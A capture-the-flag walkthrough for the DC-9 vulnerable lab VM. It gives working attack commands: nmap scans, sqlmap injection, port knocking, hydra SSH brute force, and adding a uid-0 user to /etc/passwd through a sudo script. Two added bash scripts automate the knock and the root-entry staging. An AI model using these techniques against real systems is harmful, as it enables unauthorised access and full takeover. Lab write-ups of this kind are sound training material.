Target information

DESCRIPTION
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

TECHNICAL INFORMATION
DC-9 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

DC-9 has been tested successfully on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CREDITS
A big thanks goes out to the members of @m0tl3ycr3w.

CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

Information gathering

After deploying the VM, run an nmap ping sweep to find the live hosts on the subnet: one address is the Kali box, the other is the target. Then scan the target for open ports.

# ping sweep for live hosts on the subnet (-sP is the old name for -sn)
nmap -sP 10.0.0.0/24
# full TCP port scan of the target with service/version detection
nmap -sV -p- 10.0.0.25

Browse to port 80.

The site's search form turns out to be vulnerable to SQL injection. Save the search request from Burp Suite to a file and feed it to sqlmap; the injection succeeds.

# -r replays the saved Burp request (method, headers and body); --dbs lists the databases
sqlmap -r './dc6/bp.txt' --dbs

flag1

sqlmap dumps the password hash and cracks it to plaintext with its built-in dictionary attack; the dump also contains a list of user names and passwords.

After logging in, one page reports "File does not exist", which suggests a file inclusion vulnerability.

The local file inclusion is confirmed. Tried to include the web server log files in order to poison them, but the logs could not be found.

Further reading shows the box protects SSH with port knocking. Its configuration file was located: three ports must be hit in the configured order before SSH accepts connections.

# knock the three ports in the configured order; the connections are refused, but the knock still registers
nc 10.0.0.25 7469
nc 10.0.0.25 8475
nc 10.0.0.25 9842
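As an added example that is not part of the original write-up: the knock sequence lives in the daemon's configuration file, so instead of retyping the ports, parse the "sequence" line of the openSSH section and replay it, then check whether port 22 has opened. This assumes the daemon is knockd with a section named openSSH (the usual layout), that the OpenBSD netcat shipped with Kali is available for nc -z, and that the embedded knockd.conf is constructed: the openSSH ports are the ones recovered above, the closeSSH stanza is assumed to be the reverse order.

```bash
#!/bin/sh
# Added example, not code from the DC-9 write-up. Assumed: knockd with an
# openSSH section; OpenBSD netcat (nc -z); the sample config is constructed.

# Write a constructed knockd.conf and print its path (stands in for the
# file recovered through the LFI).
write_sample_knockd_conf() {
  conf=$(mktemp)
  cat > "$conf" <<'EOF'
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
EOF
  printf '%s\n' "$conf"
}

# Print the ports of one section's "sequence" line, space-separated, in order.
# $1 = config path, $2 = section name (e.g. openSSH). Prints nothing if absent.
extract_knock_sequence() {
  awk -v section="[$2]" '
    $0 == section { in_section = 1; next }
    /^\[/         { in_section = 0 }
    in_section && $1 == "sequence" {
      sub(/^[^=]*=[ \t]*/, ""); gsub(/,/, " "); print; exit
    }' "$1"
}

# Send one TCP SYN per port, in order. knockd only needs to see the SYN,
# so a refused connection is still a valid knock; the pause keeps the
# packets ordered and the whole sequence well inside seq_timeout.
knock() {
  host=$1; shift
  for port in "$@"; do
    nc -z -w 1 "$host" "$port" 2>/dev/null || true
    sleep 1
  done
}

# Return 0 if port 22 now accepts a TCP connection.
ssh_is_open() {
  nc -z -w 3 "$1" 22 2>/dev/null
}

# Usage: sh knock.sh <target-ip> [path/to/knockd.conf]
if [ -n "${1:-}" ]; then
  target=$1
  conf=${2:-$(write_sample_knockd_conf)}
  ports=$(extract_knock_sequence "$conf" openSSH)
  echo "knocking $target with: $ports"
  knock "$target" $ports
  if ssh_is_open "$target"; then
    echo "ssh is open on $target"
  else
    echo "ssh is still closed; check the sequence and seq_timeout"
  fi
fi
```

The closeSSH stanza matters too: if you hit the ports in reverse by mistake, the firewall rule is removed again, which is why the script reads the section by name rather than taking the first sequence it finds.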

With SSH reachable, brute-force it with hydra using the user names and passwords obtained from the database.

# -L user list, -P password list, -o write valid pairs to ssh.txt
hydra -L user.dic -P password.dic -o ssh.txt 10.0.0.25 ssh

After logging in, there is a file of passwords in the janitor user's home directory.

Add those passwords to the word list and run the brute force again; this yields additional valid users.

# same run as before, with the passwords from janitor's file added to password.dic
hydra -L user.dic -P password.dic -o ssh.txt 10.0.0.25 ssh

After logging in as one of the new users, sudo shows that a script can be run with root privileges.

The script's source was found a few directory levels above the binary.

Since it runs as root and writes one file's contents into another, the script can be used to append a new uid-0 user entry to /etc/passwd and escalate to root.

# generate a traditional crypt() hash for the password 123456 (only the first two salt characters, "sa", are used)
perl -le 'print crypt("123456","salt")'
# stage a passwd entry with uid 0 / gid 0, home /root and a bash login shell
echo "1997sty:sahL5d5V.UWtI:0:0:User_like_root:/root:/bin/bash" >> /tmp/passwd
# run the sudo-able script so it appends the staged entry to /etc/passwd
cd /opt/devstuff/dist/test
sudo ./test /tmp/passwd /etc/passwd
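As an added example that is not part of the original write-up: because the copier runs as root and appends blindly, a malformed line ends up in /etc/passwd with no easy way to undo it from an unprivileged shell, so it is worth building and checking the entry before firing it. The functions below build the entry from the write-up's own values, validate its seven-field layout, and rehearse the append on a copy of /etc/passwd. It assumes, as the write-up describes, that the script appends its first argument file to its second.

```bash
#!/bin/sh
# Added example, not code from the DC-9 write-up. Assumed: the sudo-able
# script appends file $1 to file $2; name, GECOS text and hash are the
# write-up's own values.

# Build name:hash:uid:gid:gecos:home:shell. uid 0 and gid 0 are what make
# the account root; the hash is a traditional DES crypt() value such as
#   perl -le 'print crypt("123456","salt")'
make_root_entry() {
  printf '%s:%s:0:0:User_like_root:/root:/bin/bash\n' "$1" "$2"
}

# Return 0 if the entry is well-formed: exactly seven fields, an account
# name that is not purely numeric (su/login would treat it as a uid),
# uid and gid both 0, absolute home and shell.
validate_passwd_entry() {
  printf '%s\n' "$1" | awk -F: '
    NF != 7                               { exit 1 }
    $1 !~ /^[A-Za-z0-9_][A-Za-z0-9_.-]*$/ { exit 1 }
    $1 ~ /^[0-9]+$/                       { exit 1 }
    $3 != "0" || $4 != "0"                { exit 1 }
    $6 !~ /^\// || $7 !~ /^\//            { exit 1 }
    { exit 0 }'
}

# Rehearse the append on a copy of the real file: the same operation
# "sudo ./test /tmp/passwd /etc/passwd" performs, minus the privilege.
# Return 0 if the new name then resolves to exactly one uid-0 entry.
dry_run_append() {
  entry=$1
  copy=$(mktemp)
  cp /etc/passwd "$copy"
  printf '%s\n' "$entry" >> "$copy"
  awk -F: -v n="${entry%%:*}" '
    $1 == n && $3 == "0" { c++ }
    END { if (c == 1) exit 0; exit 1 }' "$copy"
}

# Write the checked entry to the staging file the script will read.
stage_entry() {
  printf '%s\n' "$1" > "$2"
}

entry=$(make_root_entry 1997sty sahL5d5V.UWtI)
if validate_passwd_entry "$entry" && dry_run_append "$entry"; then
  echo "entry checks out: $entry"
  echo "next: stage_entry \"\$entry\" /tmp/passwd; cd /opt/devstuff/dist/test; sudo ./test /tmp/passwd /etc/passwd; su 1997sty"
else
  echo "refusing to stage a malformed or ambiguous entry" >&2
fi
```

The dry run also catches a name collision: if the chosen name already exists with uid 0, the count is two rather than one and the check fails, which is exactly the situation where a real append would leave the file ambiguous.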
